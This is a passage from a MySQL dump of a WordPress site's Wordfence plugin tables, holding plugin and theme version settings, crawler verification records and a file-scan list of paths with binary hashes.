Engine\",\"d\":true,\"r\":[\"77.75.74.0\\/24\",\"77.75.76.0\\/24\",\"77.75.77.0\\/24\",\"77.75.78.0\\/24\",\"77.75.79.0\\/24\",\"2a02:598:a::78:0\\/112\",\"2a02:598:a::79:0\\/112\",\"2a02:598:2::0\\/96\"]}}','yes'),('wordfenceI18n','1','yes'),('wordpressPluginVersions','a:4:{s:35:\"all-in-one-wp-security-and-firewall\";s:5:\"4.4.8\";s:5:\"hello\";s:5:\"1.7.2\";s:9:\"wordfence\";s:5:\"7.5.4\";s:9:\"wp-cerber\";s:5:\"8.8.5\";}','yes'),('wordpressThemeVersions','a:31:{s:6:\"Endolf\";s:3:\"1.1\";s:4:\"Kent\";s:3:\"1.2\";s:5:\"Yegor\";s:3:\"1.2\";s:7:\"advance\";s:5:\"1.1.9\";s:5:\"anima\";s:5:\"1.0.2\";s:7:\"auberge\";s:5:\"2.1.1\";s:6:\"cactus\";s:5:\"1.0.5\";s:9:\"capacious\";s:5:\"0.0.4\";s:5:\"event\";s:5:\"1.0.7\";s:8:\"fastblog\";s:5:\"1.0.6\";s:6:\"gambit\";s:5:\"1.0.8\";s:6:\"hueman\";s:6:\"3.2.10\";s:11:\"kidzoo-lite\";s:5:\"1.0.7\";s:11:\"maxbusiness\";s:3:\"1.3\";s:4:\"mora\";s:5:\"1.0.2\";s:7:\"newsmag\";s:5:\"2.1.6\";s:4:\"pine\";s:5:\"1.1.0\";s:7:\"promote\";s:5:\"1.7.0\";s:9:\"sg-window\";s:5:\"1.2.1\";s:7:\"shopone\";s:3:\"1.1\";s:13:\"showcase-lite\";s:5:\"1.2.2\";s:11:\"skt-pathway\";s:3:\"1.6\";s:9:\"spidermag\";s:5:\"1.0.8\";s:8:\"storeone\";s:3:\"1.4\";s:14:\"travel-stories\";s:3:\"1.6\";s:14:\"twentynineteen\";s:3:\"2.0\";s:12:\"twentytwenty\";s:3:\"1.7\";s:15:\"twentytwentyone\";s:3:\"1.3\";s:11:\"vision-lite\";s:5:\"1.1.3\";s:6:\"weblog\";s:5:\"1.0.1\";s:12:\"wp-barrister\";s:5:\"1.0.9\";}','yes'),('wordpressVersion','5.7.3','yes');
/*!40000 ALTER TABLE `wp_wfconfig` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfcrawlers`
--
DROP TABLE IF EXISTS `wp_wfcrawlers`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfcrawlers` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`patternSig` binary(16) NOT NULL,
`status` char(8) NOT NULL,
`lastUpdate` int(10) unsigned NOT NULL,
`PTR` varchar(255) DEFAULT '',
PRIMARY KEY (`IP`,`patternSig`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfcrawlers`
--
LOCK TABLES `wp_wfcrawlers` WRITE;
/*!40000 ALTER TABLE `wp_wfcrawlers` DISABLE KEYS */;
INSERT INTO `wp_wfcrawlers` VALUES ('\0\0\0\0\0\0\0\0\0\0�����','i��| ��OoD!���','verified',1631151432,''),('\0\0\0\0\0\0\0\0\0\0�����','�����>�b0�oQ1��','badPTR',1631151432,'5.133.207.221'),('\0\0\0\0\0\0\0\0\0\0�����','i��| ��OoD!���','verified',1631145146,''),('\0\0\0\0\0\0\0\0\0\0�����','�����>�b0�oQ1��','badPTR',1631145145,'5.133.213.208'),('\0\0\0\0\0\0\0\0\0\0��B�A�','�����>�b0�oQ1��','verified',1631234668,'crawl-66-249-65-184.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�A�','�����>�b0�oQ1��','verified',1631248511,'crawl-66-249-65-186.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�A�','�����>�b0�oQ1��','verified',1631196846,'crawl-66-249-65-188.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B�','�����>�b0�oQ1��','verified',1631543984,'crawl-66-249-66-132.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B�','�����>�b0�oQ1��','verified',1631576660,'crawl-66-249-66-134.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B�','�����>�b0�oQ1��','verified',1631598400,'crawl-66-249-66-136.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B�','�����>�b0�oQ1��','verified',1631598066,'crawl-66-249-66-140.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�H�','�����>�b0�oQ1��','verified',1631042976,'crawl-66-249-72-200.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�H�','�����>�b0�oQ1��','verified',1631049368,'crawl-66-249-72-202.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�I�','�����>�b0�oQ1��','verified',1631256948,'crawl-66-249-73-227.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�I�','�����>�b0�oQ1��','verified',1631245356,'crawl-66-249-73-230.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�K#','�����>�b0�oQ1��','verified',1631513305,'crawl-66-249-75-35.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�K)','�����>�b0�oQ1��','verified',1631340364,'crawl-66-249-75-41.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��J}��','�����>�b0�oQ1��','verified',1631143854,'rate-limited-proxy-74-125-216-199.google.com'),('\0\0\0\0\0\0\0\0\0\0��J}��','�����>�b0�oQ1��','verified',1631096302,'rate-limited-proxy-74-125-216-203.google.com'),('\0\0\0\0\0\0\0\0\0\0��_��t','i��| ��OoD!���','verified',1631156114,''),('\0\0\0\0\0\0\0\0\0\0��_��t','�����>�b0�oQ1��','badPTR',1631156114,'datacrawler-01.4server.su'),('\0\0\0\0\0\0\0\0\0\0���G�','i��| ��OoD!���','verified',1631149393,''),('\0\0\0\0\0\0\0\0\0\0���G�','�����>�b0�oQ1��','badPTR',1631149393,'192.71.3.251'),('\0\0\0\0\0\0\0\0\0\0���G S','i��| ��OoD!���','verified',1631142435,''),('\0\0\0\0\0\0\0\0\0\0���G S','�����>�b0�oQ1��','badPTR',1631142434,'192.71.32.83'),('\0\0\0\0\0\0\0\0\0\0���n\r','i��| ��OoD!���','verified',1631558072,''),('\0\0\0\0\0\0\0\0\0\0���n\r','�����>�b0�oQ1��','badPTR',1631558071,'194.110.13.14');
/*!40000 ALTER TABLE `wp_wfcrawlers` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wffilechanges`
--
DROP TABLE IF EXISTS `wp_wffilechanges`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilechanges` (
`filenameHash` char(64) NOT NULL,
`file` varchar(1000) NOT NULL,
`md5` char(32) NOT NULL,
PRIMARY KEY (`filenameHash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wffilechanges`
--
LOCK TABLES `wp_wffilechanges` WRITE;
/*!40000 ALTER TABLE `wp_wffilechanges` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wffilechanges` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wffilemods`
--
DROP TABLE IF EXISTS `wp_wffilemods`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilemods` (
`filenameMD5` binary(16) NOT NULL,
`filename` varchar(1000) NOT NULL,
`knownFile` tinyint(3) unsigned NOT NULL,
`oldMD5` binary(16) NOT NULL,
`newMD5` binary(16) NOT NULL,
`SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
`stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT 0,
`isSafeFile` varchar(1) NOT NULL DEFAULT '?',
PRIMARY KEY (`filenameMD5`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wffilemods`
--
LOCK TABLES `wp_wffilemods` WRITE;
/*!40000 ALTER TABLE `wp_wffilemods` DISABLE KEYS */;
INSERT INTO `wp_wffilemods` VALUES ('\0\\Q����i��Z�','wp-content/themes/newsmag/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G?+D����8�Q��','��!Ga��L�1R��]G������3��oE[','',0,'?'),('\0?H�\0�E}�����\"�','wp-includes/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','01����vnG��\r�',']/r~�ʺO���C�c�xB��j/�o��U�I*�','',0,'?'),('\0%��Qy~Ӂ�#`z�','wp-content/themes/storeone/template-parts/slider-blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�7�A4?$^�z��','{�vL�~��|����Q��=��c����','',0,'?'),('\0)4\nTY��d4G~�','wp-includes/images/w-logo-blue-white-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Ȉk�|�Ѽ���','O�ɗ�o����C��A�/x����<��%4=?','',0,'?'),('\00��#�9���Z4�j$','wp-admin/network/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�d4VڋS~tɱ�ź','�o�ᕑ�\"t�y�S�����M8�!9/�?Y�X�','',0,'?'),('\05g���c�0�\"D','wp-includes/css/media-views-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��M]�1f�D,��>�','�mA �7N�/z}��;��e��r�cs�#sW','',0,'?'),('\08�<lc�ˊ�gg)9�','wp-content/themes/twentytwentyone/assets/images/roses-tremieres-hollyhocks-1884.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^��L��U�\n��i�','%LIf͕�}��Y�9���&yH��2nh','',0,'?'),('\0? ��b�*��ב�U','wp-content/themes/promote/inc/kirki/assets/images/3cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o��i�#�2�:V','߰-t���:�uq�m��\\�VQ���L\'��G[@�%','',0,'?'),('\0@��5�������','wp-content/themes/hueman/assets/front/img/demo/10-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�W ۙ֟�fy\'��','�2u���b퍴I��J�q�qm��g�r�XZ�%��','',0,'?'),('\0C_\n��jD��@k','wp-admin/network/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�)��&�c���','1�t/g�7O�$�U~�4n7�Z\Z�;u��)�dk��n','',0,'?'),('\0G���M(��YlWz�!','wp-includes/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pZ�����:!�ټ�','3�l�@���o�-�3���S���Տ&�!��','',0,'?'),('\0G�S���3j�k','wp-includes/wp-includes/css/customize-preview.css',0,'1ig`��o���ӏٷ1>','1ig`��o���ӏٷ1>','�>kdU���������=@R���\r����;�','',0,'?'),('\0RȞ6� ��-����','wp-includes/wp-includes/sodium_compat/src/Core/XSalsa20.php',0,'p��Ʈ�u��o7;~z','p��Ʈ�u��o7;~z','����� %l�y�\'�#[���_�{E�]8�%�','',0,'?'),('\0[��xFLpǍ��)+�','wp-includes/wp-includes/images/media/archive.png',0,'9����h�\0��ì�u','9����h�\0��ì�u','\0�Bb�3��\'��\'��)JG ��](G�9Pr2 s','',0,'?'),('\0`Y�ϭrG����','wp-includes/SimplePie/Restriction.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[\"��~\'���$|2*�','�>�3� vj��\r|\")\"�5SR�\0�{k����{6','',0,'?'),('\0d\"��s�,���p1','wp-content/themes/wp-barrister/library/images/icon-yt.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:���u���0','�y6���DU��[�y��B�:bÃ�Y#','',0,'?'),('\0dm��G���(*�<�l','wp-content/themes/cactus/assets/plugins/respond.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�*?������9@�','\r�{Ztx\Z�A7��R�!!�琏B˔ p�]','',0,'?'),('\0i@��nrni���L\'','wp-content/themes/kidzoo-lite/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f\'+_�v��v�����','��Uyr�F�a�75�تMA��ݭ�� �','',0,'?'),('\0i��bi�6\Z��ɽܮ','wp-includes/wp-includes/sitemaps/class-wp-sitemaps-registry.php',0,'�����G���o�\n�>','�����G���o�\n�>','>��\0�B��[��Z��>�p�ޏ�a0~5k�[�G�','',0,'?'),('\0mA}=��I#���o�','wp-content/themes/twentytwentyone/assets/images/villa-with-orange-trees-nice.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�B�9����Ǭ�','Γ�&[��f��&�\'��8���I,�A��','',0,'?'),('\0m|h0;�X��np','wp-content/themes/hueman/option-tree/assets/css/ot-admin-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%���I�7���L�','}ެ߲�)��2��\Z>V�����/���7','',0,'?'),('\0v�ώ�U��V�','wp-includes/wp-includes/SimplePie/File.php',0,'i�~Hwb�x��xsٷ:�','i�~Hwb�x��xsٷ:�','0���sD���;��P�=�\'��2� ��\0Df��','',0,'?'),('\0Ơ�2!��n[�g','wp-content/themes/sg-window/inc/customize-mobile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AO7��\Z�MP�dq','!�l��\\TF\n�p%�s���zG���okb��','',0,'?'),('\0���;f��Q�=*Ǖ�','wp-includes/js/wp-emoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�����H;�q.�','�������O��)`5g�D?5F�!����','',0,'?'),('\0�9�k5&�ٙ 7N','wp-includes/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�kݢA��D�5z�yj','BQ�e!�R�il��s�nq��R41x�x�Q!','',0,'?'),('\0�G���As�7.��.�V','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���T�����}2�','�̖�^)�VX����|���p�OS]��~h�','',0,'?'),('\0��C$�\\.��:���','wp-content/themes/newsmag/assets/sass/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}���H�L��(���','�66���M��\' \0�,�8C>Ɓ�\"��~�fd','',0,'?'),('\0�\np3�5���%�e\r','wp-content/themes/capacious/layouts/homepage-layout/home-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':s���|�EסmH�]�','�_h��B�<e8�(�M�*��?�Ð]��','',0,'?'),('\0�|9��u�e���@��','wp-admin/includes/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��)�\\�w�s����}\0','�9)�>�[ �\0b|�WC����L���#�+�','',0,'?'),('\0��\ZIG�4���U��','wp-content/themes/hueman/functions/init-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' y�����no��Z�','fm΅fB��dɡ�Ȗ)y~=���V�n�a','',0,'?'),('\0�D�`�8R��ɲ%��','wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}��`i���y��','���Tܯ����19^�ջ�P\'�L�d%�k|�P؞','',0,'?'),('\0�lDd��u^��Y��','wp-admin/user/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�I���U{x1�A','F��u�X\0�og�:~��h��_��5��p�t�$','',0,'?'),('\0��f\ZxŖ���K�','wp-content/themes/weblog/acmethemes/customizer/feature-section/feature-enable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�]dGu�\0)Ud}�X�',',d�h�xY⃪d�g��>W�\nnOB��1��x&','',0,'?'),('\0�����6�uY���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9��/��IR','f�?���(��m�������Zn�ҳ���h;ފ','',0,'?'),('\0�4�o�@�Hp9|��C','wp-content/themes/pine/inc/customizer-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�w\r`���`��z>','��Kyo���\Z�ĮW$�� \"�1��$5\r��','',0,'?'),('\0�K�z\n�7�����p��','wp-includes/wp-includes/js/json2.min.js',0,'�����x�}\'��-��8','�����x�}\'��-��8','? ��s�s��(q���c!~a�ж�H�\\y','',0,'?'),('\0� $���ә\0֫','wp-includes/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�@~w\0�5','1���lmb����E�W\0�34,F˯֠�Q','',0,'?'),('\rx+�U��ڜ���','wp-includes/css/dist/list-reusable-blocks/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���6JҨNM!d��$t','E��|���K4�g�,��_��^��,�� Ev�','',0,'?'),(',�H����u\n��n','wp-content/themes/wp-barrister/library/images/icon-vcard.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g@*������\r','�F�H�Z+\"��Ʉ�1�9�{O\"$�\rb�W�','',0,'?'),('7S�I�fe���(��','wp-includes/wp-includes/blocks/buttons/block.json',0,'T���9���D?_�7E','T���9���D?_�7E','��Y]K܊�QS駤��k;� ͥ�{/ʅ�j�','',0,'?'),('<�G�+��\rO4۾[','wp-content/themes/hueman/option-tree/assets/images/layout/left-dual-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4+g��\nN�C�S�[','p\0�@(E|�H�Ӂ#dT_WԾ� �M|�qm@','',0,'?'),('L\r�����8?�J�F','wp-includes/wp-includes/bookmark.php',0,'��7!ć>pP�:�ޑ\r','��7!ć>pP�:�ޑ\r','6̎2M̥���?��&rA���bĪ�ux^с','',0,'?'),('NDj^:uT�>B�*��','wp-content/plugins/wordfence/css/main.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|8/�_NN���7�','pE(���4,�G�i�:��UML�k5�Y��','',0,'?'),('NQ�\"*hz�r�w|\Z�','wp-admin/images/media-button-other.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q&T^�]BB�g\'��','��B\Z�r�F�В���Pv-^fT�,�_��i','',0,'?'),('O�9�6��6�_s��','wp-content/themes/advance/inc/kirki/includes/output/field/class-kirki-output-field-multicolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��C�:fw��z�U�',' ��TW��&D2eeJ!����bq�\"�w�*�ߔ>�','',0,'?'),('PW��7�])x��\\�','wp-content/themes/anima/resources/images/demo/7.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƛ�������n�~A��','�_���`��>���\r��&)�%�5�}��L�','',0,'?'),('Vl�K����P%A��F','wp-includes/wp-includes/comment.php',0,'�A���]�ř3F8rȃ','�A���]�ř3F8rȃ','\'B�6E�:��bw=�#u�\0��> &���M�','',0,'?'),('X�ɘy_�7�XN/','wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\Z��.*:î�+�1','��\Z���ޔ�eg�)��QRC��A�m����','',0,'?'),(']��j��R���X','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��//R�����j���.','��3\'�X\r�o�`/��D����/�3\Z','',0,'?'),('}K&�(t�-0W�Of�e','wp-content/plugins/all-in-one-wp-security-and-firewall/images/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��$��U�d9�nW9','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js',0,'?с;��9�A����t�\n','?с;��9�A����t�\n','�k���O�{d��PS���\0M�\"B]�\"�E��','',0,'?'),('�m!U߄���U','wp-content/plugins/wp-cerber/assets/flags/bz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�����ڜ�','�0^k R�e�����q��C���G���Q\"��','',0,'?'),('�T�h���zP��r�','wp-admin/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iz��k���$]�','��\'MLJ)�ֺma� �fq�JK�-����Ȧ�','',0,'?'),('�ϋД\'Ot�ʗM;','wp-includes/js/dist/deprecated.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U���@�\Z���>','y���e@���r6�1��r\0.t/�7\\��Wy','',0,'?'),('�Qk�ԃ�Q3��%��','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/embedded.png',0,'����p�N��y~�n\"','����p�N��y~�n\"','�{��u�x�\'����J�º@i\"H;�]6h','',0,'?'),('Ņ��p��{;VO^�Y7','wp-content/themes/advance/images/blank1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����PϢ}�)�#�','c�������>�?�QYY�NZr��\"��^G<��[','',0,'?'),('�X|_��wc�:�j��','wp-includes/blocks/search/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�虚-�.�\Z��2 �','O�ͯ�G�2�\n�ɣ~�V��\Z6��|x','',0,'?'),('��E?tB9b��vF`1','wp-content/plugins/wordfence/modules/login-security/img/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('�pPZ�/�]{�~{�$D','wp-content/themes/newsmag/assets/vendors/bootstrap/glyphicons-halflings-regular.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{�W]c\'\rd�`','����$�6�`�|��y+�^ 8c%���k�','',0,'?'),('�aB R����X�','wp-includes/wp-includes/js/wp-auth-check.js',0,'j{�,��ݍ�][c','j{�,��ݍ�][c','�R)C�`p�� ъ ���;(�Ltcn�zƈ��','',0,'?'),(';zp�ʃ��E�#�','wp-includes/wp-includes/customize/class-wp-customize-background-image-control.php',0,'�{f�&��E\\$�sX�','�{f�&��E\\$�sX�','R�v3����~������|.O�L�t�N`Ѯ��','',0,'?'),(' A�¹Fx�l�9d','wp-content/themes/storeone/searchform-product.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������)[��_�Tq','��,���U���;T���!e`8����`��','',0,'?'),('t]�ٟu��u��j�','wp-admin/images/menu-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q���L�,_�;1/�E�','G�iH|��)��E;��\"_�;ԣ4Իw�ly�','',0,'?'),('��~�w`�5;F㮮','wp-includes/js/jquery/ui/effect-size.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t(������D','�[�9E�3%��4�F�9��:�uØ�~j9�','',0,'?'),('�=��q�\rljA+','wp-admin/user/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<D\0�\n#���E����','X�x�no�{\0���\\��䞿��e[��jZN','',0,'?'),('\'�5�ur߲���m','wp-content/plugins/wp-cerber/cerber-whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���D�pM����Q�','t<e��F/�+�A�8�_�D\Z�����[��jg','',0,'?'),('<)8T*.�SuS�ĺ�','wp-includes/SimplePie/Cache/MySQL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�) ��fz���C�0�',' ��W��A��2Lh�`���i�%iv�2���','',0,'?'),('?�◬9-�`��;�','wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.carousel.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mݕ�8��1��\'','c�(�L�#f�����~�1:J9� f��x��','',0,'?'),('F=+�IiK�Z��*','wp-content/themes/advance/inc/kirki/assets/js/functions/set-setting-value.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m���_�n|��RU��','w��vri����\n��`�4!���!��tx��S','',0,'?'),('F��/*+��k<Iy�','wp-includes/wp-includes/ID3/module.audio.ac3.php',0,'�>Y����\Zk0�aM','�>Y����\Zk0�aM','�b��^#��¨(t�^�rߘz���9�F���','',0,'?'),('HC���!���\"(�','wp-includes/js/tinymce/plugins/compat3x/css/dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wyB���o�|��','��o��Jj$��sc��R��Q��c��伍F��','',0,'?'),('J�\rӷG>�����','wp-includes/class-walker-page-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tB�B2�[eJ��5�a','Y�Ds4��I<����A�t�ȃ���\Z��G���.','',0,'?'),('M�\\\0���p��QV�','wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property-background-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Puē���P��7�','Y�´���(��sK�{�!��J���j0�M�m���','',0,'?'),('`b��n��E��,','wp-content/themes/advance/inc/kirki/assets/js/vendor/tinymce.plugin.code.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�믭�8�h�@@�','Z���\n����Km���}-��7��z��\"t k','',0,'?'),('q�{JQ���c#S��','wp-content/themes/advance/inc/kirki/assets/images/2cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̯nj��h�\'Y�','���g:�s�\'\\���9S����>,�d[�e&u���','',0,'?'),('u��s��y6\'v,��=','wp-includes/js/tinymce/plugins/wordpress/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f\\�DŽH�$�M(�l�','@��3�\nQz�p��\n�j;Q��w��k���13�<','',0,'?'),('yә��w_�� ��\"�','wp-content/themes/Kent/content-page.php',0,'%AT+�O�e�$VL6�k�','%AT+�O�e�$VL6�k�','��������eHQ���\Zu{���>�>�5~[z�','',0,'?'),('�\"�qUy���9�%Q�','wp-includes/class-wp-matchesmapregex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q���d̚w$<龦q','9�l�~�>S5]8�ٺ�ɞ���FiJ�����Z','',0,'?'),('���L��Lu@�p�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-dropdown-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n�� .*�XI��','{Yw�B��S�g�m9��2���,��|�D��aq�','',0,'?'),('�����ࣺE\0�堌','wp-content/plugins/wordfence/css/wf-colorbox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PX)p!��N8�j��','o�t0�\r�P2��N�����i���K��u���','',0,'?'),('����mx�u�)�y�\"','wp-includes/wp-includes/js/dist/vendor/moment.js',0,'�\nt�|�\'3�� 0���','�\nt�|�\'3�� 0���','\rL�G��6���q ��\\�-���P�I���','',0,'?'),('��*�����l � �8�','wp-includes/wp-includes/js/codemirror/fakejshint.js',0,'5�v�,ROlx]J\')K','5�v�,ROlx]J\')K','��-�6�$$�;���}ptO�4]2��ТR�5֡','',0,'?'),('�\"��.}}X��1�\Z�','wp-content/themes/twentynineteen/template-parts/post/discussion-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9���+�6�e�A�','�����K�j�ij�q�2�i���c^%ܓK�O?','',0,'?'),('��h��B�,��!�e','wp-content/themes/Kent/aq_resizer.php',0,'ob�t��N�1qg','ob�t��N�1qg','Q6������O�&[쮀ʵ��j���@���?V','',0,'?'),('���,�rq�m����o','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ù[�T�����r','�Z�\\U��`��c5��L\r[�s�y���}}','',0,'?'),('��Ш�,��$�p�;y�','wp-content/themes/storeone/template-parts/slider-shop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l*��X}n�,2ˋ�_','h��5Ҫr�9���\'t&ۀ1���ʲeD���','',0,'?'),('� ����K i�D��t','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Zz�#H��','n]��x�������\Z_Ѫk�B�-a�&�̃','',0,'?'),('��>����1�G��','wp-content/themes/event/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�/�ќF�����%%','�w��_���d��{� 